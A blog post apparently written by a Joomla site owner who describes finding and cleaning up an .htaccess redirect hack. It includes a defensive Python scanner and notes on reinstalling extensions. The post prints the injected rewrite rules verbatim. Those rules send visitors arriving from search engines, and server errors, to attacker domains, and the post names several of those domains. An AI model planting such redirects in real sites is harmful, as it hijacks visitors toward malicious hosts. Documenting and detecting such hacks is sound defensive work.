htaccess Redirect Attack

Rinet IT had a problem where some images weren't being loaded for the drop down boxes on the front page. Using Firebug, an addon for Firefox (my favourite browser), the image link was OK but the image wasn't being displayed in a small box in Firebug like it normally does; very puzzling.

Next I used the Net option of Firebug to check the loading of the faulty images. Instead of getting "200 OK" I got a "301 Moved Permanently" error.

After some quick research on Google I discovered htaccess hacks. I had a look at my htaccess. At first it appeared OK, but there were lots of empty lines at the start. Scrolling over to the right revealed the malicious code, as can be seen below.

The result is that the .htaccess file has been modified with:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|alaarchiv|infospace).(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-land|browseireland|finditireland|iesearch|ireland-ikz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)
RewriteRule ^(.*)$ http://gdrivedownuntil .pro/creation?8 [R=301,L]


... and after the legitimate code was ...

ErrorDocument 500 http://gdrivedownuntil. pro/creation?8

File Permissions and Destinations.

In addition, the hackers set the htaccess permissions to 0444, removing the write privilege for the file owner; just a small frustration. These guys are really annoying.

The destination sites were all dead but registered with legitimate looking owners as checked with the whois command.

The destinations changed every time and included:

  • tinkerbellcc.pro
  • complexcombining.net
  • etc!
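
A read-only check for the pattern described above, as an added example that is not part of the original post: it flags leading blank lines and whitespace padding that hide directives, referer-conditioned or off-site redirect and ErrorDocument targets, and an owner write bit that has been cleared. The function names, the thresholds (20 blank lines, 40 padding characters) and the `redirect.example` host are assumptions made for the example.

```python
import os
import re
import stat
from urllib.parse import urlparse

PAD = re.compile(r"^[ \t]{40,}\S")  # assumed threshold: directive pushed off-screen
REFERER = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
TARGET = re.compile(r'^\s*(RewriteRule\s+\S+|ErrorDocument\s+\d{3})\s+"?(https?://[^\s"]+)', re.I)

def scan_htaccess_text(text, own_hosts=()):
    """Return [(line_no, finding)] for one .htaccess body."""
    findings, lines = [], text.splitlines()
    blank = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    if blank >= 20:  # assumed threshold: real content scrolled out of view
        findings.append((1, f"{blank} blank lines before first directive"))
    referer_cond = False
    for no, line in enumerate(lines, 1):
        if PAD.match(line):
            findings.append((no, "directive hidden behind whitespace padding"))
        referer_cond = referer_cond or bool(REFERER.match(line))
        m = TARGET.match(line)
        if m:
            is_rule = m.group(1).lower().startswith("rewriterule")
            host = (urlparse(m.group(2)).hostname or "").lower()
            if host not in own_hosts:
                kind = "referer-conditioned redirect" if is_rule and referer_cond else "off-site target"
                findings.append((no, f"{kind} to {host}"))
            referer_cond = referer_cond and not is_rule  # a RewriteRule consumes its conditions
    return findings

def scan_tree(root, own_hosts=()):
    """Walk a web root; report suspicious .htaccess files and locked permissions."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_htaccess_text(fh.read(), own_hosts)
            if not os.stat(path).st_mode & stat.S_IWUSR:
                found.append((0, "owner write bit cleared, e.g. mode 0444"))
            if found:
                report[path] = found
    return report

# Constructed sample mimicking the layout described above (placeholder host).
SAMPLE = "\n" * 30 + "".join(" " * 200 + d + "\n" for d in (
    "RewriteEngine On", "RewriteCond %{HTTP_REFERER} ^.*(google|yahoo).(.*)",
    "RewriteRule ^(.*)$ http://redirect.example/x?8 [R=301,L]",
)) + "ErrorDocument 500 http://redirect.example/x?8\n"
```

Pass the site's own hostnames in `own_hosts` so that legitimate absolute redirects are not reported; `scan_tree` covers every directory because a modified .htaccess can sit anywhere under the web root.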

The Fix

First I tried finding the faulty file, spending hours on it; but it was a waste of time.

A restore from an Akeeba backup didn't help either; the rogue file must have been backed up along with everything else.

In the end I followed the advice from the Joomla Security Page 7.

  1. Save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
  2. Wipe the entire folder where Joomla! is installed. This is best done using your host's file manager or an SSH Shell session.
  3. Upload a new clean full package latest version of joomla 1.5.x or Joomla .5.x (minus the install folder).
    You can do this by uploading then extracting the zip file and then deleting the installation folder
  4. Reupload your configuration file & images, having a look at each file using a binary viewer (Notepad++ works well here) checking for malicious code etc.
  5. Reinstall the latest versions of your extensions, templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site). Once again check each file for malicious code.

The database is left intact, however some extensions reinstalled better than others.

Extension Recovery

| Extension/Plugin | Uninstall | Notes |
|---|---|---|
| Akeeba Backup | No | Reinstalling over an existing one should be OK. I removed it first and the new installation does not see the older backups. They still exist in the folder. |
| CK Forms | No | Removing this deleted the database tables for ckforms. Redoing the form is quite a pain. It would be worthwhile leaving it and try reinstalling over the top of the existing installation. For my recovery I had to copy the data from the /installation/sql SQL files to the new database using phpMyAdmin. |
| JCE | Yes | As for CK forms, although redoing the setup does not take long. |
| jQuery++ (from tusher.org) | Yes | Reinstall fresh. The codes in the articles are not removed on uninstall. |
| FAQ Slider (0.9RC5.1) | Yes | Reinstall fresh. The codes in the articles were not affected. |
| Thickbox+ v1.3.1 | Yes | Reinstall fresh. The codes in the articles were not affected. |
| JCrawler | Yes | Not reinstalled yet. |
